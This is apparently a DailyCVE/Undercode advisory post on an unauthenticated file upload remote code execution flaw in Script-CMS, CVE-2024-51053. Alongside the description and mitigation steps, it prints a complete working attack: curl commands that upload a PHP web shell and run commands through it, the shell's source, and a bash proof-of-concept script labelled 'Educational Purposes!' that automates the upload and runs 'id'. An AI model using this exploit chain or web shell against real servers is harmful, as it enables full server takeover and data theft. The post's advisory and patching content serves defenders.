Script-CMS, Unauthenticated Arbitrary File Upload RCE, CVE-2024-51053, Critical -DC-Oct2026-2814

Listen to this Post

This vulnerability exists within the file upload handling component of Script-CMS. During the installation or content management workflow, the application fails to properly validate and sanitize incoming file extensions and MIME types before saving uploaded assets to the web root or public asset directories. An attacker can craft a multipart/form-data POST request containing a PHP web shell (such as shell.php) disguised as a harmless document or image asset. Because the application lacks server-side extension whitelisting, strict MIME-type checks, and executable permission restrictions on destination storage folders, the web server writes the executable script directly into a publicly accessible directory. Consequently, a remote, unauthenticated attacker can send an HTTP GET request to the uploaded file’s URI path to execute arbitrary PHP code within the context of the underlying web server user. This permits full system command execution, local file disclosure, database extraction, and potential lateral movement across the internal hosting environment.

DailyCVE Form:

Platform: Script-CMS
Version: <= 1.0.0
Vulnerability: File Upload RCE
Severity: Critical
date: 2024-11-29

Prediction: 2024-12-15

What Undercode Say: Analytics

Target verification and web shell payload deployment via cURL
curl -X POST "http://target-cms.local/upload.php" \
-H "User-Agent: Mozilla/5.0" \
-F "[email protected];type=image/jpeg" \
-F "submit=Upload"
Verifying successful remote code execution
curl -s "http://target-cms.local/uploads/payload.php?cmd=id"
<?php
// Malicious payload uploaded via vulnerable endpoint
if (isset($_GET['cmd'])) {
system($_GET['cmd']);
exit;
}
?>

Exploit: (Educational Purposes!)

!/bin/bash
Proof of Concept: Unauthenticated File Upload RCE on Script-CMS
TARGET_URL="http://127.0.0.1:8080"
UPLOAD_ENDPOINT="${TARGET_URL}/upload.php"
SHELL_NAME="exploit_test.php"
echo "[] Creating PHP payload..."
cat << 'EOF' > ${SHELL_NAME}
<?php system($_REQUEST['cmd']); ?>
EOF
echo "[] Sending exploit payload to ${UPLOAD_ENDPOINT}..."
RESPONSE=$(curl -s -F "file=@${SHELL_NAME}" "${UPLOAD_ENDPOINT}")
echo "[] Accessing uploaded web shell to execute 'id' command..."
curl -s "${TARGET_URL}/uploads/${SHELL_NAME}?cmd=id"
echo -e "\n[] Cleanup local payload file..."
rm -f ${SHELL_NAME}

Protection:

  1. Implement strict server-side extension whitelisting (allow only specific non-executable formats like .jpg, .png, .pdf).
  2. Rename uploaded files to randomly generated UUIDs and strip extension headers upon saving.
  3. Disable PHP execution in asset and upload directories using web server configurations (e.g., `.htaccess` or Nginx `location` blocks).

Impact:

Successful exploitation allows remote attackers to execute arbitrary system commands, leading to full server takeover, data exfiltration, and complete compromise of the hosting infrastructure.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top